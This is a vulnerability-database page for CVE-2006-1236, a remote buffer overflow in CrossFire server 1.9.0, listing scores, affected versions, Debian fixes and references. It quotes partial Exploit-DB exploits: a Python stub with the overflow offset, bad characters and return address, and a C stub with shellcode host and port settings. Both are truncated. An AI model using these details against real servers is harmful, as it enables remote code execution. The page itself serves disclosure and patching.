CVE-2006-1236
Published 2006-03-15
Priority: P349
high · 7.5 · CVSS 2.0 · AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 27.40% (97.8th percentile)
Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| crossfire | crossfire | — | — |
| crossfire | crossfire | >= 0 < 1.9.0-2 | 1.9.0-2 |
| crossfire | crossfire | >= 0 < 1.9.0-2 | 1.9.0-2 |
| crossfire | crossfire | >= 0 < 1.9.0-2 | 1.9.0-2 |
| crossfire | crossfire | >= 0 < 1.9.0-2 | 1.9.0-2 |
| debian | crossfire | < crossfire 1.9.0-2 (bookworm) | crossfire 1.9.0-2 (bookworm) |
CVSS provenance
nvd: v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
osv: 6.4 MEDIUM
vendor_debian: 6.4 MEDIUM
GHSA
GHSA-3hxr-9gc8-927w: Buffer overflow in the SetUp function in socket/request
ghsa_unreviewed · 2022-05-01 · CVSS 6.4 · MEDIUM
OSV
CVE-2006-1236: Buffer overflow in the SetUp function in socket/request
osv · 2006-03-15 · CVSS 6.4 · MEDIUM
Debian
CVE-2006-1236: crossfire - Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 all...
vendor_debian · 2006 · CVSS 6.4 · MEDIUM
Scope: local
bookworm: resolved (fixed in 1.9.0-2)
bullseye: resolved (fixed in 1.9.0-2)
forky: resolved (fixed in 1.9.0-2)
sid: resolved (fixed in 1.9.0-2)
trixie: resolved (fixed in 1.9.0-2)
No detection rules found.
Exploit-DB
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
exploitdb · 2021-08-18 · CVSS 7.5 · HIGH
---
# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
# Exploit Author: Khaled Salem @Khaled0x07
# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz
# Version: 1.9.0
# Tested on: Kali Linux 2020.4
# CVE : CVE-2006-1236
#!/bin/python
import socket
import time
# Crash at 4379
# EIP Offset at 4368
# Badchar \x00\x20
# ECX Size 170
# CALL ECX 0x080640eb
size = 4379
# Attacker IP: 127.0.0.1 Port: 443
shellcode = b""
Exploit-DB
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
exploitdb · 2006-03-13
---
// crossfire-server
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 13327 // default port
#define SC_PORT 33333 // default shellcode port
#define SC_HOST "127.0.0.1" // default shellcode host
unsigned char sc_cb[] = // izik's
unsigned char sc_bind[] = // izik's
No writeups or analysis indexed.
http://cvs.sourceforge.net/viewcvs.py/crossfire/crossfire/socket/request.c?rev=1.86&view=log
http://packetstormsecurity.com/files/163873/Crossfire-Server-1.0-Buffer-Overflow.html
http://secunia.com/advisories/19237
http://secunia.com/advisories/19276
http://www.debian.org/security/2006/dsa-1009
http://www.osvdb.org/23904
http://www.securityfocus.com/bid/17093
http://www.vupen.com/english/advisories/2006/0951
https://exchange.xforce.ibmcloud.com/vulnerabilities/25252
https://www.exploit-db.com/exploits/1582
Published: 2006-03-15